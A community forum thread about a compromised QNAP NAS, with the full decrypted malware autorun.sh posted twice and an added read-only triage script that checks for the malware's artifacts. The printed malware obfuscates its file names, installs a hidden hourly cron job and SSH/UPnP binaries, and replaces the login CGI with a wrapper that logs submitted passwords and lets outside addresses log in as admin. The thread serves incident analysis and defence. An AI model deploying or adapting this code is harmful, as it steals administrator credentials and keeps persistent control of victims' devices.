Strange folders and cronjobs
- dolbyman
- Guru
- Posts: 21190
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Strange folders and cronjobs
8TB external drives are cheap..should be plenty of space for movies
-
- Starting out
- Posts: 28
- Joined: Wed Nov 18, 2015 4:50 am
Re: Strange folders and cronjobs
dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
not too cheap 300euro :/
- dolbyman
- Guru
- Posts: 21190
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
- Don
- Guru
- Posts: 12021
- Joined: Thu Jan 03, 2008 4:56 am
- Location: Long Island, New York
Re: Strange folders and cronjobs
benzo83 wrote:Can I safely remove these files? Can any QNAP employee answer me?
No, QNAP employees cannot answer you. This is a community forum and not a QNAP support channel. If you want an answer from QNAP then you need to open a ticket.
Read the Online Manuals and use the forum search feature before posting.
It is recommended to use RAID and have external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.
Submit bugs and feature requests to QNAP via their Helpdesk app.
NAS: TVS-882BR | F/W: 4.3.6.0895 | 40GB | 2 x M.2 SATA RAID 1 (System/VMs) | 4 x M.2 NVMe QM2-4P-384A RAID 5 (Cache) | 5 x 4TB HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-663 | F/W: 4.5.1.1540 | 16GB | 2 x M.2 NVMe QM2-2P RAID 1 (Cache) | 4 x 4TB RAID 5
Apps: Boinc, Squid, DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS, Entware, DLstation, +others
-
- Been there, done that
- Posts: 592
- Joined: Thu Aug 24, 2017 10:28 pm
Re: Strange folders and cronjobs
This is a nasty piece of sh.itware you've got there.
I decrypted the autorun.sh (see further below).
I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs
So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gapped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.
Decrypted autorun.sh:
Code:
#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
//I;s/\(^\|\
\)\[[^\
]\+\]\
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
bdir=
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm`
upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR")
cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB")
sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT")
sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb")
sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox")
sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH")
archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn")
archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr")
ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB")
crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY")
arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"`
test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || {
mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; }
__BOOT_DEV=
__model=`getcfg System "Internal Model"`
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; }
for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done
test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; }
test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
EOF
test "$fgrep" || fgrep=grep
test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"
test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"
test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }
cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }
chmod 755 "${bdir}/.${ipath}/${crons}.sh"
if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0"
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi
for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"
grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && {
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat`
test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}
. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }
true;
}
#]
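Added example, not part of the original post or of the malware: a read-only triage script that looks for the artifacts the decrypted autorun.sh above creates (the injected hourly cron line, the authLogin.cgi wrapper with its QTSauthLogin.cgi copy, and the .log/.cgi_log and .BOOT_TIME files). The function names, the root-directory argument and the sample tree (including `.example_dir/example_job.sh`) are constructed for illustration; the patterns themselves are taken from the script as posted.

```shell
#!/bin/sh
# Read-only triage for artifacts the posted autorun.sh would leave behind.
# Every function takes a root directory ("" means the live system) so the
# same checks can run against a mounted disk image or a copied tree.
# A hit is a reason to review the file, not proof of infection.

# Same config-directory choice the posted script makes for ${confdir}.
confdir_of() {
    if [ -d "$1/etc/config" ]; then echo "$1/etc/config"
    elif [ -d "$1/mnt/HDA_ROOT/.config" ]; then echo "$1/mnt/HDA_ROOT/.config"
    fi
}

# The script inserts "<0|10|20|30> * * * * <volume>/.<dir>/<name>.sh >/dev/null 2>&1"
# into ${confdir}/crontab. Print lines with that shape: hourly schedule,
# .sh script inside a hidden directory, output redirected.
suspicious_cron_lines() {
    conf=$(confdir_of "$1")
    [ -n "$conf" ] && [ -f "$conf/crontab" ] || return 0
    grep -E '^(0|10|20|30) \* \* \* \* /[^ ]*/\.[^/ ]+/[^/ ]+\.sh >' \
        "$conf/crontab" || true
}

# The script copies authLogin.cgi to QTSauthLogin.cgi and replaces the
# original with a shell wrapper that exec's the copy. Either sign counts.
login_cgi_hooked() {
    cgidir="$1/home/httpd/cgi-bin"
    [ -f "$cgidir/QTSauthLogin.cgi" ] && return 0
    [ -f "$cgidir/authLogin.cgi" ] &&
        grep -q 'QTSauthLogin\.cgi' "$cgidir/authLogin.cgi" && return 0
    return 1
}

# Per-volume files the script writes: the captured-login log and the
# boot-time marker. Candidate volumes mirror the script's ${bdir} search.
volume_artifacts() {
    for vol in "$1"/share/* "$1/mnt/HDA_ROOT"; do
        [ -d "$vol" ] || continue
        for rel in .log/.cgi_log .BOOT_TIME; do
            [ -e "$vol/$rel" ] && echo "$vol/$rel"
        done
    done
    return 0
}

# Run all checks, print a report, return 0 only when nothing was found.
triage() {
    root=${1:-/}
    root=${root%/}
    findings=0
    cron=$(suspicious_cron_lines "$root")
    if [ -n "$cron" ]; then
        echo "[!] cron job running a script from a hidden directory:"
        echo "$cron"
        findings=$((findings + 1))
    fi
    if login_cgi_hooked "$root"; then
        echo "[!] authLogin.cgi wrapper or QTSauthLogin.cgi copy present"
        findings=$((findings + 1))
    fi
    files=$(volume_artifacts "$root")
    if [ -n "$files" ]; then
        echo "[!] files written by the script:"
        echo "$files"
        findings=$((findings + 1))
    fi
    echo "$findings indicator group(s) found under ${root:-/}"
    [ "$findings" -eq 0 ]
}

# Constructed sample tree (not real data) laid out like an affected NAS,
# for trying the checks offline. Prints the path of the temporary tree.
make_sample_tree() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/etc/config" "$t/home/httpd/cgi-bin" \
             "$t/share/CACHEDEV1_DATA/.log"
    printf '%s\n' \
        '0 4 * * * /sbin/hwclock -s' \
        '20 * * * * /share/CACHEDEV1_DATA/.example_dir/example_job.sh > /dev/null 2>&1' \
        > "$t/etc/config/crontab"
    printf '#!/bin/sh\nexec /home/httpd/cgi-bin/QTSauthLogin.cgi\n' \
        > "$t/home/httpd/cgi-bin/authLogin.cgi"
    : > "$t/home/httpd/cgi-bin/QTSauthLogin.cgi"
    : > "$t/share/CACHEDEV1_DATA/.log/.cgi_log"
    echo "$t"
}

# Scan the path given on the command line, e.g. "sh triage.sh /".
if [ $# -gt 0 ]; then triage "$1"; fi
```

The script only reads files, so it can be run on a NAS that has already been taken off the network or against a copy of its disks.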
-
- Starting out
- Posts: 28
- Joined: Wed Nov 18, 2015 4:50 am
Re: Strange folders and cronjobs
Mousetick wrote:This is a nasty piece of sh.itware you've got there.
I decrypted the autorun.sh (see further below).
I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs
So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gapped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.
Thank you.
The router is an ISP router, the NAS is a QNAP NAS, all software is up to date, and the malware vehicle is one of the NAS services. I exposed the NAS to the network with 2FA, a strong password, etc., but it was not enough.
-
- Easy as a breeze
- Posts: 356
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
benzo83 wrote:dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
not too cheap 300euro :/
Do you have music station installed and enabled?
QNAP support suspects it is caused by a vulnerability in Music Station and suggested turning it off for now.
-
- Easy as a breeze
- Posts: 356
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Mousetick wrote:This is a nasty piece of sh.itware you've got there.
I decrypted the autorun.sh (see further below).
I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs
So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gapped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; }
for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done
test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; }
test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
EOF
test "$fgrep" || fgrep=grep
test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"
test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"
test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }
cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }
chmod 755 "${bdir}/.${ipath}/${crons}.sh"
if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0"
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi
for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"
grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && {
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat`
test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
